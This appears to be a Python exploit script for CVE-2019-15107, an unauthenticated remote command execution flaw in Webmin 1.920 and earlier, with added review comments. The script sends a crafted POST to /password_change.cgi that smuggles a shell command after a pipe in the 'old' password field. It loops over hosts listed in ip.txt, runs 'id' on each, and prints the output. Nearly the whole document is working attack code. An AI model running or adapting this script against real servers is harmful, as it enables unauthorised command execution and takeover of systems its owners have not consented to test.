Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py
import requests
import warnings
# Silences every Python warning for the whole process, not one category.
# NOTE(review): this also hides the certificate warning that requests/urllib3
# emits for the verify=False call in test_post_https, so nothing on screen
# shows that TLS validation is switched off.
warnings.filterwarnings("ignore")
def test_post_https(ip, command):
    """Send one HTTPS probe to a Webmin password-change endpoint and print a verdict.

    The file name on this page ties the check to CVE-2019-15107
    (Webmin <= 1.920). A single POST goes to ``/password_change.cgi`` on
    port 10000 with ``command`` appended after ``test|`` in the ``old`` form
    field. The host is reported as vulnerable when the reply is HTTP 200 and
    contains the "current password is incorrect" message; the text between
    that message and ``</h3></center>`` is then printed as the result.

    Args:
        ip: Host name or address, inserted into the URL and Referer as-is.
        command: String placed verbatim (not URL-encoded) into the form body.

    Returns:
        None. All output goes to stdout; any exception is caught and printed.

    Review notes:
        * ``verify=False`` disables certificate validation, so the peer is
          not authenticated and the reply could come from an interceptor.
        * No ``timeout`` is passed, so an unresponsive host can block the run.
        * The verdict rests only on status 200 plus one message string.
          NOTE(review): treat it as an indicator and read the printed result
          before concluding that anything executed -- confirm against the
          vendor advisory.
        * For log review, the request shape is fixed: POST to
          ``/password_change.cgi`` with ``expired=2``, a ``|`` inside ``old``,
          Cookie ``redirect=1; testing=1; sid=x`` and a ``session_login.cgi``
          Referer.
    """
    marker = 'Failed to change password : The current password is incorrect'
    try:
        origin = 'https://' + ip + ':10000'
        request_headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': origin + '/session_login.cgi',
            'Cookie': 'redirect=1; testing=1; sid=x',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'application/x-www-form-urlencoded',
            # Fixed value, independent of the body built below.
            # NOTE(review): requests normally derives Content-Length from the
            # body for string data -- confirm which value is actually sent.
            'Content-Length': '47',
        }
        form_body = 'user=a&pam=&expired=2&old=test|' + command + '&new1=test1&new2=test1'
        resp = requests.post(
            origin + '/password_change.cgi',
            data=form_body,
            headers=request_headers,
            verify=False,
        )

        # Anything other than "200 + marker" is reported as not vulnerable,
        # and the full response body is dumped for manual inspection.
        if resp.status_code != 200 or marker not in resp.text:
            print('[!]NotVulnerable:%s' % ip)
            print(resp.text)
            return

        print('[+]Vulnerable:%s' % ip)
        # len(marker) is 61, the offset the result slice starts at.
        start = resp.text.index(marker) + len(marker)
        end = resp.text.index('</h3></center>')
        print('Result:')
        print(resp.text[start:end])
    except Exception as e:
        # Broad catch: network errors and a missing '</h3></center>' both
        # end up here and are only printed.
        print('[!]Error:%s' % e)
def test_post_http(ip, command):
    """Send one plain-HTTP probe to a Webmin password-change endpoint and print a verdict.

    The file name on this page ties the check to CVE-2019-15107
    (Webmin <= 1.920). A single POST goes to ``/password_change.cgi`` on
    port 10000 with ``command`` appended after ``test|`` in the ``old`` form
    field. Three outcomes are handled:

    * HTTP 200 containing the "current password is incorrect" message:
      reported as vulnerable, and the text between that message and
      ``</h3></center>`` is printed as the result.
    * HTTP 200 containing "This web server is running in SSL mode.":
      the same check is retried through ``test_post_https``.
    * Anything else: reported as not vulnerable, with the body printed.

    Args:
        ip: Host name or address, inserted into the URL and Referer as-is.
        command: String placed verbatim (not URL-encoded) into the form body.

    Returns:
        None. All output goes to stdout; any exception is caught and printed.

    Review notes:
        * The request and any returned output travel in cleartext here.
        * No ``timeout`` is passed, so an unresponsive host can block the run.
        * The verdict rests only on status 200 plus one message string.
          NOTE(review): treat it as an indicator and read the printed result
          before concluding that anything executed -- confirm against the
          vendor advisory.
        * For log review, the request shape is fixed: POST to
          ``/password_change.cgi`` with ``expired=2``, a ``|`` inside ``old``,
          Cookie ``redirect=1; testing=1; sid=x`` and a ``session_login.cgi``
          Referer.
    """
    marker = 'Failed to change password : The current password is incorrect'
    try:
        origin = 'http://' + ip + ':10000'
        request_headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': origin + '/session_login.cgi',
            'Cookie': 'redirect=1; testing=1; sid=x',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'application/x-www-form-urlencoded',
            # Fixed value, independent of the body built below.
            # NOTE(review): requests normally derives Content-Length from the
            # body for string data -- confirm which value is actually sent.
            'Content-Length': '47',
        }
        form_body = 'user=a&pam=&expired=2&old=test|' + command + '&new1=test1&new2=test1'
        resp = requests.post(
            origin + '/password_change.cgi',
            data=form_body,
            headers=request_headers,
        )

        if resp.status_code == 200:
            if marker in resp.text:
                print('[+]Vulnerable:%s' % ip)
                # len(marker) is 61, the offset the result slice starts at.
                start = resp.text.index(marker) + len(marker)
                end = resp.text.index('</h3></center>')
                print('Result:')
                print(resp.text[start:end])
                return
            if 'This web server is running in SSL mode.' in resp.text:
                # The server refused plain HTTP; repeat the check over TLS.
                print('[*]This web server is running in SSL mode.Try to use https')
                test_post_https(ip, command)
                return

        print('[!]NotVulnerable:%s' % ip)
        print(resp.text)
    except Exception as e:
        # Broad catch: network errors and a missing '</h3></center>' both
        # end up here and are only printed.
        print('[!]Error:%s' % e)
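if __name__ == '__main__':
    # Reads host entries from ip.txt in the working directory, one per line,
    # and runs the plain-HTTP check on each with the fixed command 'id'.
    # The context manager closes the file handle, which the original left open.
    with open('ip.txt', 'r') as file_object:
        for line in file_object:
            # Only trailing CR/LF is stripped; other whitespace reaches the URL.
            test_post_http(line.strip('\r\n'), 'id')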